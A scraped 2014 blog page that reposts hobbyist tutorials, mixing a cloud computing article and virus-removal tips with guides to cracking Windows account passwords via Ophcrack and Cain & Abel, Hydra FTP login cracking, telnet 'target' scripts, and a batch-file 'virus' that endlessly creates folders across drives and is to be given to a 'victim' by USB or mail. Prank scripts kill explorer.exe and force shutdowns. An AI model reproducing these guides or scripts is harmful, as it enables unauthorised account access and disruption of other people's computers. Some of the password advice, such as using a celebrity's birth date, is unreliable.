Follow Us

This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Tuesday 9 September 2014

What cloud computing really means

What cloud computing really means

 

Cloud computing is all the rage. "It's become the phrase du jour," says Gartner senior analyst Ben Pring, echoing many of his peers. The problem is that (as with Web 2.0) everyone seems to have a different definition.
As a metaphor for the Internet, "the cloud" is a familiar cliché, but when combined with "computing," the meaning gets bigger and fuzzier. Some analysts and vendors define cloud computing narrowly as an updated version of utility computing: basically virtual servers available over the Internet. Others go very broad, arguing anything you consume outside the firewall is "in the cloud," including conventional outsourcing.
[ Stay on top of the state of the cloud with InfoWorld's "Cloud Computing Deep Dive" special report. Download it today! | Also check out our "Private Cloud Deep Dive," our "Cloud Security Deep Dive," our "Cloud Storage Deep Dive," and our "Cloud Services Deep Dive." ]
Cloud computing comes into focus only when you think about what IT always needs: a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software. Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT's existing capabilities.
Cloud computing is at an early stage, with a motley crew of providers large and small delivering a slew of cloud-based services, from full-blown applications to storage services to spam filtering. Yes, utility-style infrastructure providers are part of the mix, but so are SaaS (software as a service) providers such as Salesforce.com. Today, for the most part, IT must plug into cloud-based services individually, but cloud computing aggregators and integrators are already emerging.
InfoWorld talked to dozens of vendors, analysts, and IT customers to tease out the various components of cloud computing. Based on those discussions, here's a rough breakdown of what cloud computing is all about:
1. SaaSThis type of cloud computing delivers a single application through the browser to thousands of customers using a multitenant architecture. On the customer side, it means no upfront investment in servers or software licensing; on the provider side, with just one app to maintain, costs are low compared to conventional hosting. Salesforce.com is by far the best-known example among enterprise applications, but SaaS is also common for HR apps and has even worked its way up the food chain to ERP, with players such as Workday. And who could have predicted the sudden rise of SaaS "desktop" applications, such as Google Apps and Zoho Office?
2. Utility computingThe idea is not new, but this form of cloud computing is getting new life from Amazon.com, Sun, IBM, and others who now offer storage and virtual servers that IT can access on demand. Early enterprise adopters mainly use utility computing for supplemental, non-mission-critical needs, but one day, they may replace parts of the datacenter. Other providers offer solutions that help IT create virtual datacenters from commodity servers, such as 3Tera's AppLogic and Cohesive Flexible Technologies' Elastic Server on Demand. Liquid Computing's LiquidQ offers similar capabilities, enabling IT to stitch together memory, I/O, storage, and computational capacity as a virtualized resource pool available over the network.

 

Thursday 4 September 2014

How to Hack Windows Passwords With Ophcrack

How to Hack Windows Passwords With Ophcrack

 

 

 

Picture of How to Hack Windows Passwords With Ophcrack
Ah, the old "How do I get my lost user password back?". Well, this time I am happy to say that there is a way to recover your password WITHOUT reformatting your hard drive. First off, what operating system are you using? If you are using Windows or Linux the first solution will work for you.

 

Step 1: Download The Corect Verison

Picture of Download The Corect Verison
It uses Rainbow Tables to crack NTLM and LM hashes into plain text. There are two ways to run Ophcrack. One, it can be installed and run as a standard application. Two, you can burn the ISO to a CD and boot from the disk and run the Linux based GUI. In your case you would need to burn to a disk and boot from the disk drive. The first step would be to visit the Ophcrack website and download the LiveCD version of Ophcrack for the correct operating system
(http://ophcrack.sourceforge.net/download.php?type=livecd)

Step 2: Burn To ISO

Picture of Burn To ISO
Once you have downloaded the correct ISO you will need a program to burn the ISO. I recommend ISO Recorder(http://isorecorder.alexfeinman.com/download/ISORecorderV2RC1.msi)

Step 3: Start Cracking!

Picture of Start Cracking!
Once you have burned the ISO to a CD you will need to make sure the disk is in the CD drive and reboot the computer. Now when the computer is booting you will need to press the correct key to get you into the Boot Menu. It is usually F10 or Delete. Once in the boot menu select the disk drive that the CD is in. Now follow the on screen directions. After it gets to the menu press the "Crack" button and it will do its magic. In about 10 minutes it will tell you what the Password is. I hope this answers your questions.

3 Foolproof ways to get Administrator Priviledges on Windows XP or Vista


3 Foolproof ways to get Administrator Priviledges on Windows XP or Vista





Picture of 3 Foolproof ways to get Administrator Priviledges on Windows XP or Vista
3429867cain.jpg
ophcrack-4.jpg
This instructable will show you 3 ways to find any password for any account on a computer. These 3 programs are Cain and Abel, OphCrack, and OphCrack Live Cd.

 

Step 1: Cain and Abel

Picture of Cain and Abel
cain1.bmp
Get it Here : http://www.oxid.it/
You will also need the Rainbow Tables: http://ophcrack.sourceforge.net/tables.php
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

This program needs access to your hard drive in order to work. You also need to install WinPcap, which comes with the installer. After downloading the Rainbow tables, extract the files (table0, table 1, etc.) into the Cain folder. The run the program. In the "Cracker" tab, click LM and NTLM hashes. The click the blue cross at the top toolbar and then click OK. this will dump all the users on the computer. Find the account you want to hack and right click on it. Then go to Cyptananylisis attack, LM Hashes and then to Rainbow tables. Click start and wait while the password is decoded. You can then tinker wth the many features of this program

Hacking windows with batch programs

Hacking windows with batch programs

 

 


Picture of Hacking windows with batch programs
Basicly this instructible will teach you how to hack windows computers using the cammand prompt and batch programs.

 

Step 1: Ping

Picture of Ping
Ping is a default program in Windows that can be used to ascertain whether your intended target is online or not. The following script uses the ping command tho u could just use the ping command in cmd. It would allow more control over the pinging.


@echo off
Title Pinger
Color a
set /p t=Target IP Adress:
Ping %t%
Echo.
Echo.
Pause
Exit


This code is typed up in notepad or some other text editor. it is then saved with the file extension .bat

Step 2: Telnet

Picture of Telnet
Code:
************************************************************************************************************
@echo off
color a
title Telnet
:start
cls
echo.
echo.
set /p ip=Target IP:
echo.
set /p prt=Port (default: port 23):
echo.
set yn=
set /p yn=Establish a connection (y/n):
if %yn%==y goto tel
if %yn%==Y goto tel
if %yn%==n goto start
if %yn%==N goto start
:tel
telnet %ip% %prt%
pause
goto start
************************************************************************************************************

Type this into Notepad,change file type to All Files, and save as "Telnet.bat".

used properly telnet can can allow direct access to a computers hard drive. once you learn how to use telnet you can use it to delete and copy files to and from your target computer. telnet hacking is a science all its own. learning everything you can do with telnet takes time but it's worth it. as with everything else you could probably find a tutorial on telnet use on the interwebs. to learn its basic commands you could type "telnet /?".

How to hack Ftp server using hydra

How to hack Ftp server using hydra

 

 


How to hack Ftp server using hydra

Picture of How to hack Ftp server using hydra
This tutorial will tech you how you can hack by FTP
THC-Hydra - The Fast and Flexible Network Login Hacking Tool

 
Remove these adsRemove these ads by Signing Up

Step 1: How to start

Picture of how to start
Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Step 2: Linkis to download

Picture of Linkis to download
2.jpg

How to Restore Folder Options in the Control Panel

How to Restore Folder Options in the Control Panel

 

 


Picture of How to Restore Folder Options in the Control Panel
2.JPG
Computer virus is a self-replicating executable program that damage or even destroy files or disks. It always occupies disk space and sometimes the main memory. There are different anti-virus softwares which can effectively remove viruses such as Norton, Avira, NOD32, Kaspersky, McAfee, AVG, Avast, etc. The different kinds of viruses are boot-sector virus, denial-of-service attack, e-mail worm, file virus, hoax, macrovirus, multipartite virus, etc.

Even though viruses have already been removed/deleted in your computer, it left damages to your computer. One of them is the changed attribute in your folders from archive/read-only to hidden. Thus, you will think that some of your folders have already been erased or deleted by virus and anti-virus. Just look at the status bar to see how many hidden folders in a particular drive or path in your computer.

If you will try to change again its attribute in the folder options at the control panel, you will be shocked to know that the folder options icon is missing. It has been removed in the control panel. It has been hidden together with some of your important folders. And even if you try to restore the folder options icon in the toolbar by customizing it, it has no use for you can never click it at all.

Of course, you can still see your hidden folders by using special program for compressed files called WinRAR, you can use it to delete *.exe made by the virus (* represents any name of your folder or file copied by the virus).

But there are many things which you want to do that cannot be done through WinRAR such as copying and pasting folders/files, viewing folders/files in thumbnails, etc.

The only solution is to restore the folder options in the control panel. In this instructable, I am going to teach you step-by-step how to restore folder options in the control panel. It will also appear in My Computer and its icon can now be used in the toolbar. Please be sure that all viruses have already been removed before you apply this advanced computer tutorial.

Periander "theSeventhSage" Esplana
http://thebibleformula.webs.com
http://www.internetsecretbook.com

How to Choose a Good Password: A few quick tips on how to stay safe

How to Choose a Good Password: A few quick tips on how to stay safe

 

 

 

Picture of How to Choose a Good Password: A few quick tips on how to stay safe
mandatory%2012%20keep%20locked.gif
Your password is more than just a key to your online account. If your password falls into the wrong hands, someone can easily impersonate you while online, sign your name to online service agreements or contracts, engage in transactions, or change your account information. So, choose your password carefully and then keep it safe from others.

A password is like a toothbrush: Choose a good one and don't share it.

A password can be any length, and can contain spaces, symbols, or numbers. With so many options, you should be able to come up with a password that's easy for you to remember but impossible for someone else to figure out. A password is a secret that only you should know.

Wanna make a good Password? Hit that next step button and find out how....


 

Step 1: How should that password be? What aspects should it have?

Picture of How should that password be? What aspects should it have?
locked_laptop.jpg




First and most important of all: A good Password should be memorable for you, yet hard for others to guess.

You might have the greatest Password on Earth, but It's worth nothing if you don't easily remember it!

A good example would be a celebrity's birth date. No one could guess that as a password, and you can easily look it up if you forget.



Avoid using a word. Avoid a complete word from a dictionary (English or otherwise) or a name.


You'd be surprised how easy it is for someone who knows you to guess your password. They know exactly what to expect, and what not to expect.

Example:

Use Psterboard instead of Posterboard



Use at least 10 characters.


The more characters your password contains, the harder it is for someone to guess it. A long but simple password can be safer than a short, complex one and often easier to remember.

Example:

Johnnywenttotheparkyesterday might be safer than 3iblesrules4



Use a combination of capital and lowercase letters, numbers, and standard symbols (! @ # $ % & *).


If the place that you want to create a password for differences capital and lowercase letters, be sure to use both. Even if someone hears your password, a different capitalization can make a difference.

Example:

Instead of automobile, write aUTomObile



Don't use personal information that someone could easily figure out.


Avoid a password based on information easily obtained about you (like your birthday, your child or pet's name, phone number, license plate number, employer, school name, automobile brand, or street name).

Don't use a password you already use for another account, such as your bank account PIN.

Like I said above, people who know you know what and what not to expect from you.

Example:

Try not to use your screenname as your password. Not even with Different capitalization or spelling.



Avoid the obvious.


This is where a lot of people screw up. People think that if they use a password thats not even a word or something along those lines, they'll be safe. People think that if they use something totally irrational, no one will expect that.

Stay away from obvious passwords such as "test" or "password."

When you change your password, change several characters; don't just append a number like "2" to the end. And make sure anyone watching you enter your password can't guess it as you type (such as a password typed using a single hand, like "qwerty").

Example/

Don't make it easy for attackers by repeating a digit or letter (like "111111" or "FFFFFF") or any other common sequence of characters (like "123456").



Put a new spin on a familiar phrase. MiX i+ Up!!


This is where you start mixing and experimenting with the above tips.

Pick a favorite phrase or lyric for your password.

To shorten it, substitute letters with a number or a standard symbol or remove vowels. For example, "fredsboy" can be made into "Fr3d$boy." Shorten "two tickets to paradise" to "2Tickets2Paradiz," or combine "cat" and "dog" into "cAt!Do8."



If you use a password generator, be careful.


Make sure you can identify and trust the creator of a password management or generator program. Never share any personal information unless you trust the company or person you're working with.

Online password-generator programs can help you create a random password that is generally harder to crack but also more difficult to remember.

Another factor to consider, is that sooner or later, you could find patterns in these, and eventually know what to expect.

Make Simple Virus in Notepad

Make Simple Virus in Notepad

 

 


Picture of Make Simple Virus in Notepad
Here we are going to show, How to make Simple Virus in notepad.



Step 1 : We will Create a Virus

Step 2 : We will Check it on Victims Computer.

[ Note : Don't try it on your computer ]

 

Step 1: Open Notepad and Copy the Following code in Notepad.

Picture of Open Notepad and Copy the Following code in Notepad.
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in


Step 2: Give it to Victim

Picture of Give it to Victim
Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will Create More Folder in C,D,and E drive.

Shutdown Prank

Shutdown Prank

 

 


Picture of Shutdown Prank
Firstly, right-click the desktop, highlight new click SHORTCUT...

 

Step 1: Typing the code...

Picture of Typing the code...
type in this code as the name

shutdown -s -t 25 -c "PLACE YOUR MESSAGE HERE"

Step 2: Almost Done!!!

Picture of Almost Done!!!
Click Next To Continue....

Step 3: SAVE

Picture of SAVE
Save as FAKE VIRUS SHUTDOWN.exe   or whatever you want .exe

Step 4: Conclusion

Picture of Conclusion
This is what it should look like when completed...

Funny Fake Virus Code

Funny Fake Virus Code




Picture of Funny Fake Virus Code
This virus will scare your friends if they don't know you did it
if you have any comments or questions leave them

 

Step 1: Run CMD

Picture of Run CMD
First you have to run the CMD program to do this
goto programs goto run and type in CMD or Command

Step 2: Setting it up

Picture of Setting it up
To set this CMD code up when the CMD pop up comes up put this in w/out Quotes
"EDIT"

Step 3: The Code

Picture of The Code
Copy this Code:
@echo OFF
title Virus Detected Do Not Close Window
echo Virus Detected attempting to remove virus...
echo (press any key to continue)
pause >nul
echo Virus is spreading throughout the system...
echo (press any key to destroy)
pause >nul
echo destroying virus...
echo (press any key to continue)
pause >nul
echo files deleted to destroy virus
echo (press any key to cancel)
pause >nul
taskkill /f /im explorer.exe
cls
echo cancel failed
echo (press any key to restore)
pause >nulecho files restored
start /im explorer.exe
cls
echo files restored
echo (press any key to continue)
pause >nul
echo checking for virus...
echo virus still detected
echo (press any key to destroy)
pause >nul
echo virus is destroyed
echo (press any key to exit)
pause >nul
shutdown -s -t 5 -c "virus infected everything Windows is shuting down"
______________________________________________________________________________
Remember to save this as a batch file by adding at the end .bat

How to make a Fake Virus with a Batch File

How to make a Fake Virus with a Batch File

 

 


Picture of How to make a Fake Virus with a Batch File
In this Instructable I will be showing you how to make a batch file, that should fool your friends into thinking that their computer has a virus. It will look something like the above image when it's running. At the end of the program a message will pop up that says "Your computer has committed suicide. Good-bye". Then the computer will shutdown. To cancel the shutdown procces type "shutdown /a" into command prompt and press enter.

 

Step 1: Open notepad

Picture of Open notepad
Open the typing program notepad on your computer. You'll use notepad to make the batch file.

Removing a virus without using any anti-virus software

Removing a virus without using any anti-virus software

 

 


Picture of Removing a virus without using any anti-virus software
Virus is a computer program that can copy itself and infect computers.
The term "virus" is erroneously used to refer to other types of malware, including adware and spyware programs that do not have the reproductive ability.
A true virus can spread from one computer to another (in some form of executable code).
One of the ways by which a virus can infect your PC is through USB/Flash drives.
Common viruses such as 'Ravmon' , 'New Folder.exe', 'Orkut is banned' are spreading through USB drive .
Most anti virus programs are unable to detect them and even if they do, in most cases they are unable
to delete the file, only quarantine it.So in our post we use command prompt to remove harmful files that
any anti-virus can't.


These are the steps.

 

Step 1:

Picture of
 Run the command prompt by going to start and type cmd on the search programs and files.

Step 2:

Picture of
 Select the virus affected drive
                 (drivename: )
examples
C:
J:
F:
D:
E:

Step 3:

Picture of
 type attrib -s -h *.* /s /d then press enter

Step 4:

Picture of
 type dir 
        the dir command shows you the content of the drive

Step 5:

Picture of
check if there is an unusual .exe file
                 if there's an autorun.inf file rename it

                    (rename filename.extension newfilename )

Step 6:

Picture of
by doing the following steps you can now acces the drive without affecting the virus

 Go to my computer

Step 7:

Picture of
Select the drive

Step 8:

Picture of
Delete the harmful files
             *you can also delete the harmful files using command prompt
              ( type del filename)

Wednesday 3 September 2014

How to Remove shortcut virus from PC/Laptop/Pen drive – Solved!

How to Remove shortcut virus from PC/Laptop/Pen drive – Solved!

 

This post is about Remove shortcut virus, In our PC/Laptop or in Pen drive we generally see one shortcut type folder which created automatically, many times when we use internet and downloading something then it might be that shortcut virus downloaded within your downloaded file and many times when we transfer the data from one computer to another computer and if one computer is affected from shortcut virus then surely other attached computer will also affected by shortcut virus in between data transfer, many times we insert our pen drive or any other external drive into other’s PC which are already affected by shortcut virus then our pen drive or external drive will be affected from shortcut virus.
Remove shortcut virus
I personally faced the shortcut virus problem in my PC, the shortcut virus damage the computer OS slowly, slowly, shortcut virus will create shortcut folder and file name same as original folder and file name and if you click on that shortcut virus files and folder then it will infect your PC poorly.
For the solution of the Shortcut Virus problem I am going to write some easiest way to remove shortcut virus from PC/Laptop/Pen drive and other external drives. There are lots of methods available to remove shortcut virus, including CMD, Registry entry, free software, Paid software, using .Dat file etc. Here i will explain the way to remove shortcut virus from computer, Remove shortcut virus USB (Delete Shortcut Virus).
Remove shortcut virus

Remove Shortcut virus from PC from PC/Laptop/Pen drive – Methods

 

 

1) How to Remove Shortcut virus using CMD

If you are suffering from the shortcut virus problem, then surely you tried to remove shortcut virus files manually, but files are not removed, they show some error messages, so for the solution of this error message simply follow the below step and remove shortcut virus from your PC.
Step 1) Open CMD (Command Prompt – DOS)
Step 2) Write the below command
attrib -h -s -r -a /s /d Name_drive:\*.*
Simply replace the Name_drive with your actual drive letter, for example, if you want to remove shortcut virus from C drive, then type attrib -h -s -r -a /s /d c:\*.*
Step 3) Hit enter button
Step 4) Now, after that all the shortcut virus files and folder will be normal files and folder form simply go and delete the shortcut virus files and folder

2) How to Remove Shortcut virus using a .bat file

Bat file is nothing but an executable file which can create in notepad and directly executed by double clicking on it, you can also do the above method, process using .bat file, I know you are thinking that why he writes same method twice, but guys you have noticed that if your all drives are infected from shortcut virus then you have to run above command separately for each and every drive, it takes your lots of important time so the solution of this problem I am writing the new method to remove shortcut virus.
Step 1) Open notepad file
Step 2) Copy and paste the below code into a notepad file
@echo off
attrib -h -s -r -a /s /d Name_Drive:\*.*
attrib -h -s -r -a /s /d Name_Drive:\*.*
attrib -h -s -r -a /s /d Name_Drive:\*.*
@echo complete.
Step 3) simply replace the Name_Drive with your infected drive name, if you have more than 3 drive then simply copy and paste the command.
Step 4) Save the file with name removevirus.bat
Step 5) Now simply close the file and run it
Step 6) After that all of your Shortcut virus files and folder are in normal form, now go and remove the shortcut files and folders

3) How to Remove shortcut virus using ‘Shortcut virus remover software’

This method is the easiest and best method to remove shortcut virus from PC, there is a strong reason behind it, In above methods (CMD and.Bat file) you have to run command manually and delete each and every shortcut virus file and folder manually, I know you are also lazy like me ;) who don’t want to waste their time in executing commands and delete files manually, so for the solution of this problem follow the below steps and believe me this software helps you a lot and remove all of your shortcut virus from your PC/Pen drive.
Step 1) First of all download the “Shortcut Virus Remover software free download” from below link
Step 2) Open the shortcut virus remover software
Note: The software it doesn’t need to install, it directly run
Step 3) Select the Pen drive or Computer (Select from which you want to remove viruses)
Remove shortcut virus
Step 4) Now selects the Drives and click on the Scan button
Remove shortcut virus
Step 5) After that click on the Delete button
That’s it, now all of your shortcut virus files from your PC/Laptop/Pen drive are removed.
I hope you like my article and methods to “Remove shortcut virus from computer/ Laptop/ Pendrive”, You can also use the above methods to Remove shortcut virus from external hard disk,  if you have any type of doubt or question then please let me know in below to comment so that I will try to remove your doubts and answer your questions.